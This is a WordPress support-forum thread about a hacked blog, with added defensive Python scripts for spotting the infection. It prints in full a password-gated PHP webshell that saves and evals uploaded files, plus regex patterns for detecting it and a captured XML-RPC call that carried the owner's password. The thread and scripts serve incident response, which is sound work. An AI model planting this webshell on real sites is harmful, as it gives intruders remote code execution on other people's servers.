• My WordPress installation has been exploited before by the various XML-RPC edits, but I believe I’d cleaned up everything. Today I noticed 3 distinctive hex strings at the top of every page. WordPress is otherwise fully functional.

    c1608e58b7a40647381b4667630bf061
    82d58bfc8dc7a2fa985939b01d5b694f
    69175bee376c12eba6ddbd1f632a7f10

    Google results show others have been victims of the same exploit. Overwriting all files with another installation does not change this, suggesting it involves a theme that was not overwritten. I use a modified Hemingway.

    The following files are compromised:

    fixed_wp-blog-header.php
    wp-admin/includes/fixed_schema.php
    wp-admin/import/fixed_rss.php
    wp-admin/fixed_edit-form-advanced.php
    wp-content/fixed_wp-cache-config.php
    wp-content/plugins/wp-super-cache/plugins/fixed_searchengine.php
    wp-content/plugins/wp-super-cache/fixed_wp-cache-base.php
    wp-content/plugins/geourl/fixed_geourl.php
    wp-content/plugins/ald-meebome/fixed_admin.inc.php
    wp-content/plugins/akismet/fixed_akismet.php
    wp-content/plugins/fixed_hello.php
    wp-content/themes/default/images/fixed_header-img.php
    wp-content/themes/default/fixed_header.php
    wp-content/themes/hemingway/blocks/fixed_related_posts.php
    wp-content/themes/classic/fixed_header.php
    wp-content/themes/quentin/fixed_header.php
    wp-includes/js/fixed_wp-ajax-js.php
    wp-includes/js/tinymce/plugins/spellchecker/includes/fixed_general.php
    wp-includes/js/tinymce/plugins/spellchecker/fixed_config.php
    wp-includes/js/tinymce/plugins/spellchecker/classes/utils/fixed_Logger.php
    wp-includes/js/tinymce/plugins/spellchecker/classes/fixed_TinyPspellShell.class.php
    wp-includes/js/tinymce/langs/fixed_wp-langs.php
    wp-includes/js/tinymce/fixed_tiny_mce_config.php
    wp-includes/fixed_pluggable-functions.php
    wp-stats.php

    The exploit was apparently triggered by the following visit which occurred after I had installed 2.5:

    web.moea.unam.mx - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    mostro.politicas.unam.mx - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    mostro.politicas.unam.mx - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    web.moea.unam.mx - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    web.moea.unam.mx - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    web.moea.unam.mx - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
    mostro.politicas.unam.mx - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"

    It’s entirely possible I’ve had these files for some time and they were implanted by an earlier exploit, but did not express themselves until a new, perhaps theme-editing, exploit reactivated them. I’m not familiar at all with WordPress’s workings or its security.

    I believe all of the files contain the same code, buffered with many blank lines before and after. The “PASSWD” may be different in different files:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','92c06d9c2c240ddd01f7cb449db72103');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>
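    Two things in the pasted shell are useful to a defender cleaning this up: visited without the right POST value it prints exactly three markers, md5("mark_start"), md5("mark_pass") and md5("mark_end"), and every dropped copy shares one skeleton (a define('PASSWD', <32 hex>), $HTTP_POST_FILES handling and an eval()). The script below is an added triage example, not code from this thread or from WordPress; it computes the three markers so they can be compared with the strings at the top of the poster's pages, and walks an install looking for files with the shell's skeleton or the "fixed_"/"co_" name prefixes reported in this thread. The sample tree it builds is constructed; every other name in it is this script's own.

```python
"""Triage helpers for the backdoor pasted in this thread (added example).

Facts taken from the pasted shell: testdata() prints md5("mark_" + tag) for
the tags start, pass and end when the password check fails, and every copy
defines PASSWD as a 32-hex md5 and evals an uploaded file. Filename
prefixes come from posters in this thread; everything else is assumed.
"""
import hashlib
import os
import re
import tempfile

MARKER_PREFIX = "mark_"
MARKER_TAGS = ("start", "pass", "end")   # order the shell prints them in

# Filename prefixes reported by posters in this thread.
DROPPER_PREFIXES = ("fixed_", "co_")

# Content indicators from the pasted shell. All three must be present to keep
# false positives down; any one alone is common in legitimate PHP.
SHELL_PATTERNS = (
    re.compile(r"define\(\s*'PASSWD'\s*,\s*'[0-9a-f]{32}'\s*\)"),
    re.compile(r"\$HTTP_POST_FILES\["),
    re.compile(r"\beval\s*\("),
)


def shell_markers(prefix=MARKER_PREFIX, tags=MARKER_TAGS):
    """Compute the md5 markers the shell prints for the given tags."""
    return {tag: hashlib.md5(f"{prefix}{tag}".encode()).hexdigest() for tag in tags}


def match_markers(observed):
    """Map each observed hex string to the marker tag it matches, or None."""
    by_hash = {h: tag for tag, h in shell_markers().items()}
    return {s.strip().lower(): by_hash.get(s.strip().lower()) for s in observed}


def looks_like_shell(text):
    """True when the file carries the complete PASSWD/upload/eval skeleton."""
    return all(p.search(text) for p in SHELL_PATTERNS)


def scan_for_dropped_shells(root):
    """Return (relative path, reasons) for every .php file that trips an indicator."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if name.startswith(DROPPER_PREFIXES):
                reasons.append("dropper-style filename prefix")
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if looks_like_shell(fh.read()):
                        reasons.append("PASSWD/HTTP_POST_FILES/eval skeleton")
            except OSError:
                reasons.append("unreadable")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def demo():
    """Build a constructed mini WordPress tree, one clean file and one
    indicator sample padded with blank lines as the poster describes, and scan it."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    theme = os.path.join(root, "wp-content", "themes", "hemingway")
    os.makedirs(os.path.join(theme, "blocks"))
    with open(os.path.join(theme, "index.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n<h1>Hello</h1>\n")
    # Constructed sample: the skeleton only, not a working copy of anything.
    sample = ("\n" * 40 + "<?php\ndefine('PASSWD','" + "0" * 32 + "');\n"
              "if (md5($_POST['p']) == PASSWD) { $f = $HTTP_POST_FILES['f']['tmp_name']; eval($code); }\n"
              "?>" + "\n" * 40)
    with open(os.path.join(theme, "blocks", "fixed_related_posts.php"), "w") as fh:
        fh.write(sample)
    return scan_for_dropped_shells(root)


if __name__ == "__main__":
    for tag, digest in shell_markers().items():
        print(tag, digest)
    for path, reasons in demo():
        print(path, ", ".join(reasons))
```

    Run it against a copy of the web root rather than the live tree, and treat the name-prefix hit as a hint only: the skeleton match is the stronger signal, since the poster's list shows the same payload under many different names.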
Viewing 11 replies - 1 through 11 (of 11 total)
  • Once again, what you pasted is not the hack; it’s simply the file access. I stress this because it’s nearly identical to another post here.

    You cannot, once again, you CANNOT, open wp-admin/theme-editor without having the proper credentials.

    If you examine what you pasted, you can see that they logged in.

    Install my plugin that provides logging, if you want to see exactly what is going on:

    https://www.village-idiot.org/post-logger/

    I’m also going to go out on a limb and say that, since I’ve seen that exact thing on older installs that were exploited, your password was compromised some time ago.

    Here’s my bet.

    You install my logging plugin.

    You change your password.

    Within a day, you will see older exploit attempts that worked on the older versions for grabbing your admin password.
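    The point being made here, that the access log shows a login rather than a hole, can be checked mechanically. Below is an added example, not code from this thread or from the post-logger plugin: it parses Apache combined log lines and pairs a POST to /wp-login.php answered with a 302 (WordPress redirects on a successful login) with the theme-editor.php reads and writes that follow it. It groups by user agent rather than by host, because the poster's excerpt shows one Opera client arriving through two hostnames; that choice, the ten-minute window and the sample lines (constructed to mirror the shape of the poster's excerpt, with the hostnames replaced by documentation addresses) are all this script's own.

```python
"""Find login-then-theme-editor sessions in an Apache access log (added example).

The log lines below are constructed in the shape of the excerpt posted in
this thread; hostnames are replaced with RFC 5737 addresses.
"""
import re
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

SAMPLE_LOG = """\
203.0.113.10 - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.11 - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.11 - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.10 - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.10 - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.10 - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
203.0.113.11 - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
198.51.100.7 - - [14/Apr/2008:15:02:00 -0600] "GET / HTTP/1.1" 200 12570 "-" "Mozilla/5.0 (constructed reader)"
""".splitlines()


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_theme_editor_sessions(lines, window=timedelta(minutes=10)):
    """Per user agent: a POST /wp-login.php answered 302, then theme-editor.php
    requests within `window`. GETs count as reads, POSTs as writes (saves)."""
    by_ua = {}
    for rec in filter(None, map(parse_line, lines)):
        by_ua.setdefault(rec["ua"], []).append(rec)

    sessions = []
    for ua, recs in by_ua.items():
        recs.sort(key=lambda r: r["time"])
        current = None
        for r in recs:
            if (r["method"] == "POST" and r["path"].startswith("/wp-login.php")
                    and r["status"] == 302):
                current = {"ua": ua, "login": r["time"], "hosts": {r["host"]},
                           "reads": 0, "writes": 0, "files": set()}
                sessions.append(current)
            elif (current is not None
                    and r["path"].startswith("/wp-admin/theme-editor.php")
                    and r["time"] - current["login"] <= window):
                current["hosts"].add(r["host"])
                if r["method"] == "POST":
                    current["writes"] += 1
                else:
                    current["reads"] += 1
                q = re.search(r"[?&]file=([^&]+)", r["path"])
                if q:
                    current["files"].add(q.group(1))
    return [s for s in sessions if s["reads"] or s["writes"]]


if __name__ == "__main__":
    for s in find_theme_editor_sessions(SAMPLE_LOG):
        print(s["login"], sorted(s["hosts"]), "reads", s["reads"], "writes", s["writes"],
              "files", sorted(s["files"]))
```

    A session with writes to theme-editor.php is someone saving a theme file with a valid login, which is why the advice here is a password change and log review rather than a patch.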

    Thread Starter lucent (@lucent)

    Thank you. That explanation does seem most likely. I have installed your plugin and changed my password and will watch the log.

    I received an email from Google saying one of my sites (only a WordPress blog) was compromised and that any results for this site would now feature a warning from Google. Long story short, I discovered the exact same code in my blog and removed it. This seems like a definite exploit in WordPress (2.3.3 here).

    I had the same problem. I only found out after I upgraded to 2.5.1 and decided to completely reinstall my blog (except for the database).

    After a little bit more than half a week today I finally got lucky with the post-logger.

    <?xml_version = \"1.0\"?>
    <methodCall><methodName>metaWeblog.getRecentPosts</methodName>
    	<params>
    		<param><value><string>C6CE3FFB3174106584CBB250C0B0519BF4E294</string></value></param>
    		<param><value><string>UserName</string></value></param>
    		<param><value><string>PassWord</string></value></param>
    		<param><value><int>1</int></value></param>
    	</params>
    </methodCall>
    78.90.14.123
    /xmlrpc.php
    May 11, 2008, 11:20 pm

    There it was: my (now invalid) password, from some host in Bulgaria.

    Now what should I do with this information?
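    The captured body above is a MetaWeblog API call, and the poster's old password sat in its third parameter. The script below is an added example, not part of this thread or of the post-logger plugin: it parses a logged XML-RPC methodCall the way a defender reviewing such captures would, skipping the mangled declaration the logger recorded, naming the method, and reporting whether the call carried credentials without ever storing the password itself. The parameter positions it uses are those of the MetaWeblog specification (blogid/postid, username, password, ...) plus two Blogger-API methods with the same layout; the second sample call and the output format are this script's own.

```python
"""Triage a captured XML-RPC request body for credential-bearing calls (added example)."""
import xml.etree.ElementTree as ET

# Body as the poster pasted it from post-logger, mangled declaration included.
# The username and password shown were already replaced by the poster.
CAPTURED = r"""<?xml_version = \"1.0\"?>
<methodCall><methodName>metaWeblog.getRecentPosts</methodName>
	<params>
		<param><value><string>C6CE3FFB3174106584CBB250C0B0519BF4E294</string></value></param>
		<param><value><string>UserName</string></value></param>
		<param><value><string>PassWord</string></value></param>
		<param><value><int>1</int></value></param>
	</params>
</methodCall>"""

# Constructed sample of a call that carries no credentials.
PINGBACK = ('<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
            '<params><param><value><string>http://source.example/post</string></value></param>'
            '<param><value><string>http://blog.example/?p=1</string></value></param>'
            '</params></methodCall>')

# (username index, password index) within params. Every metaWeblog.* method
# takes (blogid-or-postid, username, password, ...); these Blogger-API methods
# take (appkey, username, password).
CREDENTIAL_POSITIONS = {
    "blogger.getUsersBlogs": (1, 2),
    "blogger.getUserInfo": (1, 2),
}


def credential_positions(method):
    if method.startswith("metaWeblog."):
        return (1, 2)
    return CREDENTIAL_POSITIONS.get(method)


def parse_method_call(body):
    """Return (methodName, [(type, text), ...]) from a logged methodCall body."""
    # The logger wrote the prolog with escaped quotes, which is not well-formed
    # XML, so parse from the root element instead of trusting the prolog.
    start = body.find("<methodCall")
    if start < 0:
        raise ValueError("no <methodCall> element in body")
    root = ET.fromstring(body[start:])
    method = (root.findtext("methodName") or "").strip()
    params = []
    for value in root.findall("./params/param/value"):
        typed = list(value)            # <string>, <int>, <struct>, ... child, if any
        if typed:
            params.append((typed[0].tag, (typed[0].text or "").strip()))
        else:
            params.append(("string", (value.text or "").strip()))  # untyped = string
    return method, params


def triage_call(body):
    """Summarise one call; records the username and password length only."""
    method, params = parse_method_call(body)
    rec = {"method": method, "param_count": len(params),
           "credentials": False, "username": None, "password_len": 0}
    pos = credential_positions(method)
    if pos and len(params) > max(pos):
        rec["credentials"] = True
        rec["username"] = params[pos[0]][1]
        rec["password_len"] = len(params[pos[1]][1])   # never persist the password
    return rec


if __name__ == "__main__":
    for body in (CAPTURED, PINGBACK):
        print(triage_call(body))
```

    A logger that writes these bodies verbatim keeps every password sent to xmlrpc.php in plaintext, which is how the poster's own password ended up readable in the log; a triage pass like this one records who logged in and when, and nothing more.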

    You’re using my post-logger plugin??

    That, btw, should be an old exploit.

    I am SO glad to know that that captures xmlrpc requests.

    Now what should I do with this information?

    Like I said, that should be an old exploit.

    If you want, though, you can pass that on to [email protected] and reference this thread. Rest assured that if it isn’t, Matt will come along and edit this thread.

    And good for you, for not only upgrading but for being proactive and, no doubt, curious enough to use my plugin to locate the ‘presumed’ entry point. WP needs more warriors.

    whooami, I downloaded your post-logger, but am not sure how to install it.
    When I go to my WordPress admin page, I get this code:
    c1608e58b7a40647381b4667630bf061
    82d58bfc8dc7a2fa985939b01d5b694f
    69175bee376c12eba6ddbd1f632a7f10

    Same thing I’m seeing when I try to go to my blog page.

    I do have FTP access to the server & have Fantastico through my host. If I install a new version of WordPress over my old one, will my posts remain intact?

    sonnata,

    I haven’t a clue why you are seeing that. But it’s showing up in Google’s cache of your site from May 6.

    https://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+https://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us

    You’re worrying about apples and oranges — apples being those numbers, and oranges being my plugin.

    In other words, they’re not related.

    You need to fix the problem with your blog before installing any plugins.

    If I install a new version of WordPress over my old one, will my posts remain intact?

    If you can follow instructions, of course they will. But, like I just indicated, what you are seeing might be a sign of something that necessitates more than a simple upgrade.

    I did not have your plugin installed before this problem occurred. I was hoping it would help me track down the cause of it.

    I have tried upgrading WordPress according to the link you gave me, with both the Three Step Upgrade as well as the more detailed upgrade instructions.

    Neither worked. Still seeing this code on both the /wp-admin/ page as well as https://www.homeproductsnmore.net/

    c1608e58b7a40647381b4667630bf061
    82d58bfc8dc7a2fa985939b01d5b694f
    69175bee376c12eba6ddbd1f632a7f10

    BTW, this is the only thing that appears on either page.
    I have backed up my database. Would moving it to another host & reinstalling WordPress there fix this?
    I’m at a loss as to what to do at this point.

    Same problem for me today. Files were named co_wp-app.php, co_404.php, etc.
    If I delete xmlrpc.php, what would be the effect on these attacks? Would I be able to use pingback or receive pingback?

    If you remove or rename xmlrpc.php, you will not be able to receive pingbacks. I don’t know about sending them, though. Trackbacks should still work.

  • The topic ‘Theme-editing exploit?’ is closed to new replies.